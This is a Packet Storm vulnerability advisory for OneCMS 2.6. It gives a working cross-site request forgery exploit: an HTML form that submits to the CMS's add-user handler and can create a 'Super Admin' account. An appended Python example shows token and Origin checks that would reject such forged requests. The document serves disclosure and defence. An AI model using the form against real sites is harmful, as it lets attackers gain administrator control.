OneCMS 2.6 Cross Site Request Forgery

2010-03-30T00:00:00
ID PACKETSTORM:87765
Type packetstorm
Reporter ItSecTeam
Modified 2010-03-30T00:00:00

Description

`
( #Topic : OneCMS_v2.6 2010-03-25  
( #Bug type : remote add admin user exploit  
( #Download : http://sourceforge.net/projects/onecms/files/onecms/v2.6/OneCMS_v2.6.zip/download  
  
===========================================================================  
( #Author : ItSecTeam  
( #Email : Bug@ITSecTeam.com  
( #Website: http://www.itsecteam.com  
( #Forum : http://forum.ITSecTeam.com  
( #Original Advisory : www.ITSecTeam.com/en/vulnerabilities/vulnerability29.htm  
( #coded by ahmadbady  
( #Special Tnx : PLATEN , 0xd41684c654 , b3hz4d , Pejvak , Cdef3nder , mijax , r3dm0v3 , M3hr@n.S And All Team Members!  
  
  
---------------------------------------------------------------------  
exploit:  
  
<html>  
<head></head>  
<body>  
<form action='users.php?load=users&view=add2' method='post'>  
<table cellspacing="0" cellpadding="3" border="0" align="left">  
<tr><td>Username</td><td><input type="text" name='name'></td></tr>  
<tr><td>Password</td><td><input type="password" name='password1'></td></tr>  
<tr><td>E-Mail</td><td><input type="text" name='email'></td></tr>  
<tr><td>User Level</td><td><select name='level' multiple size='5'>  
<option value="Super Admin">Super Admin</option>  
<option value="Member">Member</option>  
<option value="Super Staff">Super Staff</option>  
<option value="Staff">Staff</option>  
</select></td></tr>  
<tr><td></td><td><input type="submit" name="Add" value="Add User"></td></tr>  
</table>  
</form>  
</body>  
</html>  
---------------------------------------------------------------------  
`
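The form above is accepted because the add-user handler takes nothing that proves the POST was sent from a page the CMS itself served. As an added example, not code from the advisory or from OneCMS, here is the synchronizer-token check such a handler could apply, with an Origin/Referer check as a second line of defence; `SITE_ORIGIN`, the `csrf_token` field and `add_user` are hypothetical names.

```python
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "https://cms.example.test"  # constructed: origin of the OneCMS install
TOKEN_FIELD = "csrf_token"                # hypothetical hidden field name

def issue_token(session: dict) -> str:
    """Mint a per-session synchronizer token; the CMS renders it into its own form."""
    token = secrets.token_hex(32)
    session[TOKEN_FIELD] = token
    return token

def same_site_origin(headers: dict) -> bool:
    """Second line of defence: the Origin (or Referer) must name this site."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False  # no provenance at all: treat as cross-site
    p = urlparse(src)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN

def csrf_check(session: dict, headers: dict, form: dict) -> bool:
    """True only if the POST carries the session's token and a same-site Origin."""
    expected = session.get(TOKEN_FIELD)
    supplied = form.get(TOKEN_FIELD, "")
    if not expected or not supplied:
        return False
    if not hmac.compare_digest(expected, supplied):  # constant-time compare
        return False
    return same_site_origin(headers)

def add_user(session: dict, headers: dict, form: dict) -> tuple:
    """Hypothetical guarded handler for users.php?load=users&view=add2."""
    if not csrf_check(session, headers, form):
        return ("rejected", None)
    return ("added", {"name": form["name"], "level": form["level"]})

def demo() -> tuple:
    session = {}
    token = issue_token(session)
    # Constructed same-site submission: the CMS's own form, token included
    legit = add_user(session, {"Origin": SITE_ORIGIN},
                     {"name": "alice", "password1": "pw", "email": "a@example.test",
                      "level": "Member", TOKEN_FIELD: token})
    # Constructed cross-site submission shaped like the advisory's form: no token
    forged = add_user(session, {"Origin": "https://attacker.example"},
                      {"name": "x", "password1": "pw", "email": "x@e.test", "level": "Super Admin"})
    return (legit[0], forged[0])
```

The token must be tied to the victim's session and compared in constant time; the Origin check alone is weaker, since some clients strip Referer and a missing header has to be treated as cross-site.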